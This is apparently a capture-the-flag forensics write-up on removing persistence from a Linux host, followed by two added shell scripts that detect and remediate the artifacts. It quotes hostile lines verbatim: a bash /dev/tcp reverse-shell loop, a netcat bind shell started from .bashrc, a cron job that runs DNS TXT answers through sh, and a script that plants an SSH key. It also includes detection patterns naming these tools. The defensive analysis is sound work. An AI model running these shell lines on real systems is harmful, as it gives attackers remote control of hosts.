### sufficient: the gnats user

No gnats package is installed and no such binary exists on the box, but `gnats` is a standard Debian system account (uid/gid 41, home `/var/backups`, shell `/usr/sbin/nologin`). Here it has a bash login shell and a real password hash in `/etc/shadow`:

```
gnats:$6$SLVgdKJw4kQ5L0bv$ODjJstI50dhKq/IPbmLiZyJpcIPkifIUJGsQ.4f9EguBzf5JeI4sswDo9DsGZ39CDHP8h5AnnSNW5wgi7GeLZ.:18761:0:99999:7:::
```

We disable the user by replacing the `$6$` (SHA-512 crypt) hash with a star `*` and changing the login shell in `/etc/passwd` to `/usr/sbin/nologin`. Also make sure the primary group is correct: the account has been given gid `0` (root).

- Replace the hash in `/etc/shadow` with `*`
- Remove gid `0` for user gnats in `/etc/passwd` (Debian's default for gnats is gid 41)
- Set the shell back to `/usr/sbin/nologin`

### sufficient: cron job that executes DNS TXT responses

```
root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# crontab -u user -l
* * * * * /bin/sh -c "sh -c $(dig imf0rce.htb TXT +short @ns.imf0rce.htb)"
```

Every minute the job asks `ns.imf0rce.htb` for the TXT record of `imf0rce.htb` and passes the answer to `sh -c`, so the attacker can push arbitrary commands through DNS. Remove the job from the user's crontab:

```
crontab -u user -e
```

### sufficient: `connectivity-check` spawns reverse shells

```
root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0   2616    68 ?        Ss   18:02   0:00 /bin/sh -c /usr/sbin/sshd -D -p 23
root           7  0.0  0.0  12184   928 ?        S    18:02   0:00 sshd: /usr/sbin/sshd -D -p 23 [listener] 0 of 10-100 startups
root          18  0.0  0.0   3984  1528 ?        S    18:02   0:00 /bin/bash /var/lib/private/connectivity-check
root          47  0.0  0.0   3984  1452 ?        S    18:03   0:00 /bin/bash /var/lib/private/connectivity-check
```

When inspecting the file `connectivity-check`, we find:

```bash
#!/bin/bash
while true; do nohup bash -i >& /dev/tcp/172.17.0.1/443 0>&1; sleep 10; done
```

It loops forever and every 10 seconds opens an interactive bash reverse shell to `172.17.0.1:443`. Checking which parent process starts the connectivity-check:

```bash
root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# ps -efj
UID          PID    PPID    PGID     SID  C STIME TTY          TIME CMD
root           1       0       1       1  0 18:02 ?        00:00:00 /bin/sh -c /usr/sbin/sshd -D -p 23
root           7       1       1       1  0 18:02 ?        00:00:00 sshd: /usr/sbin/sshd -D -p 23 [listener] 0 of 10-100 startups
root         325       1     315     315  0 18:27 ?        00:00:00 /bin/bash /var/lib/private/connectivity-check
root         393       1     382     382  0 18:30 ?        00:00:00 /bin/bash /var/lib/private/connectivity-check
```

The parent is PID 1 (here the sshd wrapper), which only tells us that the real parent has already exited and the processes were reparented. Within the sshd configuration we did not find anything, but grepping `/etc` did turn up something:

```
root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# grep -Hrn connec /etc/
/etc/sysctl.d/10-ptrace.conf:4:# credentials that exist in memory (re-using existing SSH connections,
/etc/update-motd.d/30-connectivity-check:3:nohup /var/lib/private/connectivity-check &
```

The `update-motd.d/30-connectivity-check` file:

```
root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# cat /etc/update-motd.d/30-connectivity-check
#!/bin/bash
nohup /var/lib/private/connectivity-check &
```

Scripts in `/etc/update-motd.d/` are run by `pam_motd` on every login, which is why new instances keep appearing.

- Delete the file `/var/lib/private/connectivity-check`
- Delete the file `/etc/update-motd.d/30-connectivity-check`
- Turn all motd scripts off: `chmod -x /etc/update-motd.d/*` (run-parts only executes files with the execute bit set)
- Kill all running instances: `pkill -f connectivity-check`

### sufficient: `alertd` bind shell on 4444/tcp, started from root's `~/.bashrc`

```
root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      7/sshd: /usr/sbin/s
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      202/alertd
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      177/alertd
tcp6       0      0 :::23                   :::*                    LISTEN      7/sshd: /usr/sbin/s
```

Root's `~/.bashrc` contains the following lines (the `alert` alias is Ubuntu's stock one; the last line was appended):

```
# Add an "alert" alias for long running commands.  Use like so:
#   sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
alertd -e /bin/bash -lnp 4444 &
```

`-e /bin/bash -lnp 4444` is netcat's bind-shell syntax (listen on port 4444, hand each connection to bash), so `alertd` is presumably a renamed netcat; a fresh copy is started at every interactive root login, which is why two `alertd` PIDs show up.

Googling the md5sum `2286f0526e891796a638f3c600d86a38`:

![](https://hackmd.io/_uploads/SyPSuYPw3.png)

- Remove `alertd`
- Remove the lines from `.bashrc`
- Kill the running listeners

### sufficient: suid binaries

```
root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# find / -perm /4000 -print 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/dlxcrw
/usr/bin/mgxttm
/usr/bin/sudo
/usr/sbin/afdluk
/usr/sbin/ppppd
/root/solveme
```

`dlxcrw`, `mgxttm`, `afdluk` and `ppppd` have random-looking names and belong to no standard package; the rest is the usual Debian/Ubuntu SUID set (`/root/solveme` is the challenge's own checker). I removed `.backdoor` before that, then `afdluk`, `ppppd` and the others that look fishy. The fewer SUID binaries, the better.

### change password of user passwd

Change the password of the user `passwd`. Solves issue 6?

### find cron files and inspect them

```
root@forensicspersistence-48658-699b8c4c6f-7xxm8:~# find /etc/cron* -type f
/etc/cron.d/e2scrub_all
/etc/cron.d/popularity-contest
/etc/cron.d/.placeholder
/etc/cron.d/anacron
/etc/cron.daily/apt-compat
/etc/cron.daily/dpkg
/etc/cron.daily/access-up
/etc/cron.daily/pyssh
/etc/cron.daily/bsdmainutils
/etc/cron.daily/man-db
/etc/cron.daily/popularity-contest
/etc/cron.daily/logrotate
/etc/cron.daily/0anacron
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.monthly/0anacron
/etc/cron.monthly/.placeholder
/etc/cron.weekly/man-db
/etc/cron.weekly/0anacron
/etc/cron.weekly/.placeholder
/etc/crontab
```

There we find a file named `pyssh` (`/etc/cron.daily/access-up` is not a stock file either and is worth inspecting):

```bash
#!/bin/sh
VER=$(python3 -c 'import ssh_import_id; print(ssh_import_id.VERSION)')
MAJOR=$(echo $VER | cut -d'.' -f1)
if [ $MAJOR -le 6 ]; then
    /lib/python3/dist-packages/ssh_import_id_update
fi
```

ssh-import-id is at version 5.x, so the check always succeeds and the `pyssh` script calls `/lib/python3/dist-packages/ssh_import_id_update` every day:

```bash
#!/bin/bash
KEY=$(echo "c3NoLWVkMjU1MTkgQUFBQUMzTnphQzFsWkRJMU5URTVBQUFBSUhSZHg1UnE1K09icTY2Y3l3ejVLVzlvZlZtME5DWjM5RVBEQTJDSkRxeDEgbm9ib2R5QG5vdGhpbmcK" | base64 -d)
PATH=$(echo "L3Jvb3QvLnNzaC9hdXRob3JpemVkX2tleXMK" | base64 -d)
/bin/grep -q "$KEY" "$PATH" || echo "$KEY" >> "$PATH"
```

Decoding the base64 content gives `/root/.ssh/authorized_keys` and `ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHRdx5Rq5+Obq66cywz5KW9ofVm0NCZ39EPDA2CJDqx1 nobody@nothing`. The script re-adds the attacker's key whenever it is missing (note that assigning `PATH` clobbers the search path, hence the absolute `/bin/grep`), so deleting the key alone is not enough. Remove all three files.

### user alias on netcat

### root's `.ssh/authorized_keys` contains a fishy authorized key:

```
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHRdx5Rq5+Obq66cywz5KW9ofVm0NCZ39EPDA2CJDqx1 nobody@nothing
```

This is the same key the daily cron job plants; remove the line together with the cron scripts, or it will be back within a day.

### `.backdoor` binary in the home directory

```
user@forensicspersistence-48658-699b8c4c6f-7xxm8:~$ file ~/.backdoor
/home/user/.backdoor: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=a6cb40078351e05121d46daa768e271846d5cc54, for GNU/Linux 3.2.0, stripped
```

### `bash` instead of `nologin` as login shell for user gnats in /etc/passwd

User `gnats` in /etc/passwd has `/bin/bash` as shell; the Debian default is `/usr/sbin/nologin` (handled in the gnats section above).

### it is not:

- apt repositories are clean (`/etc/apt/sources.list`)
- `PermitRootLogin yes` in the sshd configuration: unusual?

### current state:

```
root@forensicspersistence-48658-699b8c4c6f-ljwkf:~# ./solveme
Issue 1 is fully remediated
Issue 2 is fully remediated
Issue 3 is fully remediated
Issue 4 is partially remediated
Issue 5 is fully remediated
Issue 6 is fully remediated
Issue 7 is partially remediated
Issue 8 is fully remediated
```
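The findings above were collected by hand (`ps`, `crontab -l`, `grep -r`, `find -perm`). The following script is an added example, not part of the original notes or of the challenge: it sweeps a root directory for the same persistence classes (gid-0 or shell-enabled system accounts, unlocked system-account hashes, cron lines that fetch and execute remote content, `update-motd.d` launchers, listener/reverse-shell lines in rc files, `authorized_keys` entries, and SUID files no package owns). All function names, the detection patterns and the fixture are the author's assumptions; the fixture is constructed to mirror the artifacts on this box (the hashes are fake), and `sweep /` runs the same checks on a live host.

```shell
#!/bin/sh
# Added example (not from the original notes): one sweep over the persistence
# classes found on this box. ROOT may be / on the live host or a mounted image;
# the fixture at the bottom is constructed to mirror the artifacts above.
set -u

# Non-root accounts that either have gid 0 or are system accounts (uid < 1000)
# with an interactive shell. Output: user:uid:gid:shell
suspicious_accounts() {   # $1 = passwd file
    awk -F: '$1 != "root" && ($4 == 0 || ($3 < 1000 && $7 !~ /(nologin|false)$/)) { print $1 ":" $3 ":" $4 ":" $7 }' "$1"
}

# System accounts whose shadow entry holds a usable hash ("$id$..."), i.e. not
# locked with "*" or "!". Output: user:$id$
system_accounts_with_hash() {   # $1 = shadow file, $2 = passwd file
    awk -F: 'NR == FNR { if ($3 < 1000 && $1 != "root") sys[$1] = 1; next }
             ($1 in sys) && $2 ~ /^\$/ { match($2, /^\$[^$]*\$/); print $1 ":" substr($2, RSTART, RLENGTH) }' "$2" "$1"
}

# Cron entries that fetch and run remote content (the dig-TXT job above is the
# textbook case). Output: the offending lines
suspicious_cron_lines() {   # $@ = crontab files
    grep -hE '^[^#].*(dig |curl |wget |/dev/tcp|bash -i|base64 -d)' "$@" 2>/dev/null
}

# update-motd.d scripts are run by pam_motd at login; one that backgrounds a
# process (nohup, trailing &) is a launcher, not a banner. Output: file names
suspicious_motd_scripts() {   # $1 = update-motd.d directory
    grep -lE 'nohup|&[[:space:]]*$' "$1"/* 2>/dev/null
}

# Shell rc files that start a listener or reverse shell at login; the pattern
# covers netcat bind/reverse-shell syntax and bash /dev/tcp. Output: file:line:text
suspicious_rc_lines() {   # $@ = rc files
    grep -HnE '(/dev/tcp|bash -i|-l[nv]*p [0-9]+|-e /bin/(ba)?sh)' "$@" 2>/dev/null
}

# authorized_keys entries with the comment first, since that is what stands out
# here (nobody@nothing). Output: comment keytype keyprefix...
list_authorized_keys() {   # $1 = authorized_keys file
    awk 'NF >= 2 && $1 ~ /^(sk-)?(ssh-|ecdsa-)/ { c = ($3 == "" ? "(no comment)" : $3); print c, $1, substr($2, 1, 20) "..." }' "$1"
}

# SUID files that no installed package owns (only meaningful with root dir /;
# silently skipped where dpkg is absent).
unpackaged_suid() {   # $1 = root dir
    command -v dpkg >/dev/null 2>&1 || return 0
    find "$1" -xdev -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        dpkg -S "$f" >/dev/null 2>&1 || echo "$f"
    done
}

sweep() {   # $1 = root dir; prints a sectioned report
    r=$1
    echo "[accounts]"; suspicious_accounts "$r/etc/passwd"
    echo "[hashes]";   system_accounts_with_hash "$r/etc/shadow" "$r/etc/passwd"
    echo "[cron]";     suspicious_cron_lines "$r"/etc/crontab "$r"/etc/cron.d/* "$r"/var/spool/cron/crontabs/*
    echo "[motd]";     suspicious_motd_scripts "$r/etc/update-motd.d"
    echo "[rc]";       suspicious_rc_lines "$r"/root/.bashrc "$r"/home/*/.bashrc
    echo "[keys]";     list_authorized_keys "$r/root/.ssh/authorized_keys"
    echo "[suid]";     unpackaged_suid "$r"
}

# Constructed fixture reproducing the artifacts from the notes (hashes are fake).
make_sweep_fixture() {   # prints the fixture root
    d=$(mktemp -d)
    mkdir -p "$d/etc/update-motd.d" "$d/etc/cron.d" "$d/root/.ssh" "$d/var/spool/cron/crontabs"
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
        'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
        'gnats:x:41:0:Gnats Bug-Reporting System (admin):/var/backups:/bin/bash' \
        'user:x:1000:1000::/home/user:/bin/bash' > "$d/etc/passwd"
    printf '%s\n' 'root:$6$salt$fakeroothash:18761:0:99999:7:::' \
        'daemon:*:18761:0:99999:7:::' \
        'gnats:$6$SLVgdKJw4kQ5L0bv$fakegnatshash:18761:0:99999:7:::' \
        'user:$6$salt$fakeuserhash:18761:0:99999:7:::' > "$d/etc/shadow"
    printf '%s\n' 'SHELL=/bin/sh' '17 * * * * root cd / && run-parts --report /etc/cron.hourly' > "$d/etc/crontab"
    printf '%s\n' '* * * * * /bin/sh -c "sh -c $(dig imf0rce.htb TXT +short @ns.imf0rce.htb)"' \
        > "$d/var/spool/cron/crontabs/user"
    printf '%s\n' '#!/bin/sh' 'echo' > "$d/etc/update-motd.d/00-header"
    printf '%s\n' '#!/bin/bash' 'nohup /var/lib/private/connectivity-check &' \
        > "$d/etc/update-motd.d/30-connectivity-check"
    printf '%s\n' "alias ll='ls -l'" 'alertd -e /bin/bash -lnp 4444 &' > "$d/root/.bashrc"
    printf '%s\n' 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHRdx5Rq5+Obq66cywz5KW9ofVm0NCZ39EPDA2CJDqx1 nobody@nothing' \
        > "$d/root/.ssh/authorized_keys"
    echo "$d"
}

FX=$(make_sweep_fixture)
sweep "$FX"        # against the fixture; `sweep /` does the same on the live host
rm -rf "$FX"
```

The patterns are deliberately loose (anything shelling out to `dig`, `curl` or `/dev/tcp` from cron, anything backgrounded from `update-motd.d`) because at triage time a few false positives cost less than a missed launcher; the `dpkg -S` check is what separates `dlxcrw`-style binaries from the stock SUID set without relying on file names.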
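The remediation steps above (lock `gnats`, strip the planted key from `authorized_keys`, drop the `alertd` line from `.bashrc`, disable the `update-motd.d` hooks) are listed as manual actions. The script below is an added example, not from the original notes: it performs the same file-level edits against a root directory so they can be rehearsed on a mounted image or a fixture and verified before touching a live host, where `usermod -L -s /usr/sbin/nologin -g 41 gnats` and `chmod -x /etc/update-motd.d/*` are the direct equivalents. Function names and the constructed fixture (fake hash, a made-up legitimate admin key) are the author's assumptions.

```shell
#!/bin/sh
# Added example (not from the original notes): file-level remediation of the
# account, SSH-key, rc-file and motd persistence described above, written
# against a root directory so it can be rehearsed offline.
set -u

# Lock a hijacked system account: hash -> "*" (no password login; "!" would
# keep the hash for re-enabling), primary gid restored, shell -> nologin.
# Each file is rewritten through a temp file so an interrupted run leaves the
# original untouched.
lock_system_account() {   # $1 = root dir, $2 = user, $3 = correct gid
    awk -F: -v u="$2" -v g="$3" 'BEGIN { OFS = ":" } $1 == u { $4 = g; $7 = "/usr/sbin/nologin" } { print }' \
        "$1/etc/passwd" > "$1/etc/passwd.tmp" && mv "$1/etc/passwd.tmp" "$1/etc/passwd"
    awk -F: -v u="$2" 'BEGIN { OFS = ":" } $1 == u { $2 = "*" } { print }' \
        "$1/etc/shadow" > "$1/etc/shadow.tmp" && mv "$1/etc/shadow.tmp" "$1/etc/shadow"
}

# Remove every line containing a fixed string (a key blob, a listener command)
# from a file; no-op when the file is absent. grep -v exits 1 when nothing is
# left, which is fine; on a read error (exit 2) the original is left in place.
drop_lines_containing() {   # $1 = file, $2 = fixed string
    [ -f "$1" ] || return 0
    { grep -vF -- "$2" "$1" || [ $? -eq 1 ]; } > "$1.tmp" && mv "$1.tmp" "$1"
}

# Strip the execute bit from every update-motd.d hook: pam_motd hands the
# directory to run-parts, which only runs executable files, so the directory
# itself must stay traversable (chmod -x on the directory is the wrong fix).
disable_motd_hooks() {   # $1 = update-motd.d directory
    for f in "$1"/*; do
        [ -f "$f" ] && chmod -x "$f"
    done
    return 0
}

# Verification: 0 only when the account no longer offers a way in.
account_is_locked() {   # $1 = root dir, $2 = user
    awk -F: -v u="$2" '$1 == u && $2 == "*" { ok = 1 } END { exit !ok }' "$1/etc/shadow" &&
    awk -F: -v u="$2" '$1 == u && $4 != 0 && $7 == "/usr/sbin/nologin" { ok = 1 } END { exit !ok }' "$1/etc/passwd"
}

# Constructed fixture with the planted artifacts (hash and admin key are fake).
make_remediation_fixture() {   # prints the fixture root
    d=$(mktemp -d)
    mkdir -p "$d/etc/update-motd.d" "$d/root/.ssh"
    printf '%s\n' 'gnats:x:41:0:Gnats Bug-Reporting System (admin):/var/backups:/bin/bash' > "$d/etc/passwd"
    printf '%s\n' 'gnats:$6$SLVgdKJw4kQ5L0bv$fakegnatshash:18761:0:99999:7:::' > "$d/etc/shadow"
    printf '%s\n' 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHRdx5Rq5+Obq66cywz5KW9ofVm0NCZ39EPDA2CJDqx1 nobody@nothing' \
        'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFakeKeyForTheLegitimateAdminAccountXYZ admin@workstation' \
        > "$d/root/.ssh/authorized_keys"
    printf '%s\n' "alias ll='ls -l'" 'alertd -e /bin/bash -lnp 4444 &' > "$d/root/.bashrc"
    printf '%s\n' '#!/bin/bash' 'nohup /var/lib/private/connectivity-check &' > "$d/etc/update-motd.d/30-connectivity-check"
    chmod +x "$d/etc/update-motd.d/30-connectivity-check"
    echo "$d"
}

remediate() {   # $1 = root dir; returns account_is_locked's status
    lock_system_account "$1" gnats 41
    drop_lines_containing "$1/root/.ssh/authorized_keys" "nobody@nothing"
    drop_lines_containing "$1/root/.bashrc" "alertd -e /bin/bash -lnp 4444"
    disable_motd_hooks "$1/etc/update-motd.d"
    rm -f "$1/etc/update-motd.d/30-connectivity-check" "$1/var/lib/private/connectivity-check"
    account_is_locked "$1" gnats
}

FX=$(make_remediation_fixture)
remediate "$FX" && echo "gnats locked, planted key and listener line removed, motd hooks disabled"
rm -rf "$FX"
```

`drop_lines_containing` matches on a fixed string rather than a regex so the base64 key blob can be passed verbatim, and it keeps the legitimate admin key in place; on the live host the cron scripts that re-plant the key (`pyssh`, `ssh_import_id_update`) still have to go, or the line returns within a day.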